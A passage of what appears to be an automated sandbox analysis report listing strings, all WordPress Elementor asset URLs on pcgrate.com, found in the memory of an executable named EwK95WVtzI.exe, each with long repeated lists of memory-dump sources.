00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 